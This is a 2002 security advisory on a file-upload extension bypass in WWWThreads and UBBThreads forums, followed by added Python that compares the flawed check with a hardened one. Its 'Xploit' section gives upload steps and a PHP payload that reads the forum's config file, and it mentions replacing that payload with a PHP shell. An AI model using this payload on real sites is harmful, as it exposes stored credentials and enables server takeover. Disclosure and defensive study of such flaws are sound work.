wwwthreads-5.5.txt

02 Feb 2002 00:00:00 | Reported by hop.to | Type: packetstorm | Source: packetstormsecurity.com

Security hole in WWWThreads and UBBThreads allows unauthorized file uploads using extension tricks.

`---------- Forwarded message ----------  
Date: 30 Jan 2002 22:12:17 -0000  
From: Root Extractor <[email protected]>  
To: [email protected]  
Subject: [ WWWThreads, UBBThreads ] Security Hole in upload system  
  
  
  
[ WWWThreads, UBBThreads ] Security Hole in  
upload system  
  
Author: RootExtractor, CompuMe  
[email protected], [email protected]  
  
I. Details  
II. Vulnerable versions  
III. Example, Xploit  
IV. Solution  
  
Details :  
  
..: config.inc.php :..  
------------------------- snip ------------------------------  
  
// $config['excludefiles'] = ".php,.asp,.js,.vbs,.sht,.htm";  
$config['allowfiles'] = ".zip,.txt,.gif,.jpg,.jpeg,.bmp";  
  
------------------------- snip ------------------------------  
  
  
Files that were not listed in the allowed files could  
still be uploaded. It seems you checked the extension,  
but if someone added an allowable extension first,  
before the bogus extension, the file would upload.  
  
Vulnerable :  
WWWThreads and UBBThreads 5.5 Dev11 and prior  
  
Not vulnerable :  
UBBThreads 5.5  
  
Example :  
You allow the upload of .txt, .jpg, .bmp, .zip;  
all files that don't have those extensions should not  
be uploaded.  
However, if somebody changes the name of the file to  
blah.txt.php, the file will validate and upload......huh !  
  
Xploit :  
1) make a new file: $ touch blah.txt.php  
2) edit it: $ vi blah.txt.php (in this step, write PHP  
code, for example)  
  
<?php  
// read the forum's config file (path relative to the upload directory)  
$readfile = join("", file("../config.inc.php"));  
print $readfile;  
?>  
  
3) save & upload it  
4) visit your blah file; now you can see the config file  
of your victim forum  
5) I replaced the readfile code with a PHP shell file  
  
  
Solution :  
Visit infopop.com and download UBBThreads 5.5  
http://www.infopop.com/  
  
  
Copyright 2002 recm security team  
http://hop.to/condor  
  
`
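The flaw the advisory describes is an extension check that is satisfied when an allowed extension appears anywhere in the filename, so `blah.txt.php` passes on the strength of `.txt`. The Python below is an added illustration, not code from the advisory and not the WWWThreads/UBBThreads source: `weak_is_allowed` is a reconstruction (an assumption) of the behaviour reported, the allow and exclude lists are the ones from the config.inc.php excerpt above, and `strict_is_allowed` / `safe_stored_name` are illustrative names for the hardened check. The hardened version goes a step beyond the specific case in the text: it decides on the final extension only, but also rejects names such as `blah.php.txt`, because Apache's mod_mime applies handlers to every dotted extension in a name, so an `AddHandler ... .php` directive can still execute such a file even though its last extension is harmless.

```python
"""
Upload filename validation: the weak check from the WWWThreads/UBBThreads
advisory beside a hardened check. Illustrative code, not the forum's own.
"""
import os
import secrets

# Lists copied from the config.inc.php excerpt in the advisory.
ALLOW_FILES = ".zip,.txt,.gif,.jpg,.jpeg,.bmp"
EXCLUDE_FILES = ".php,.asp,.js,.vbs,.sht,.htm"


def split_list(csv: str) -> list:
    """Turn the comma-separated config value into lowercase extensions."""
    return [ext.strip().lower() for ext in csv.split(",") if ext.strip()]


def weak_is_allowed(filename: str, allow: str = ALLOW_FILES) -> bool:
    """Reconstruction (assumption) of the flawed check the advisory reports:
    the upload is accepted if any allowed extension occurs anywhere in the
    name, not only at the end. 'blah.txt.php' contains '.txt' and passes."""
    name = filename.lower()
    return any(ext in name for ext in split_list(allow))


def strict_is_allowed(filename: str, allow: str = ALLOW_FILES,
                      exclude: str = EXCLUDE_FILES) -> bool:
    """Hardened check:
    - work on the basename so directory parts cannot contribute dots;
    - the final extension alone decides, and it must be on the allow list;
    - any earlier dotted component that is an excluded extension is rejected,
      because Apache mod_mime can still hand 'x.php.txt' to the PHP handler;
    - comparisons are case-insensitive, so 'shell.PHP' is not a bypass."""
    base = os.path.basename(filename).lower()
    parts = base.split(".")
    if len(parts) < 2 or not parts[0]:      # no extension, or a dotfile
        return False
    exts = ["." + p for p in parts[1:]]
    if exts[-1] not in split_list(allow):
        return False
    excluded = set(split_list(exclude))
    return not any(e in excluded for e in exts[:-1])


def safe_stored_name(filename: str) -> str:
    """Even with the strict check, store the file under a server-chosen name
    so the uploader never controls what lands on disk; only the validated
    final extension survives. Raises ValueError when the name is rejected."""
    if not strict_is_allowed(filename):
        raise ValueError("extension not allowed: %r" % filename)
    ext = os.path.basename(filename).lower().rsplit(".", 1)[1]
    return "%s.%s" % (secrets.token_hex(8), ext)


if __name__ == "__main__":
    # Constructed sample names, including the advisory's blah.txt.php case.
    for name in ["blah.txt.php", "blah.php.txt", "blah.txt",
                 "photo.JPEG", "shell.PHP", ".htaccess"]:
        print("%-14s weak=%-5s strict=%s"
              % (name, weak_is_allowed(name), strict_is_allowed(name)))
```

Running the block prints the two verdicts side by side: `blah.txt.php` is accepted by the weak check and refused by the strict one. Renaming on storage (`safe_stored_name`) is the defence that survives even if a future extension list is misconfigured, since the web server never sees a user-chosen name.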
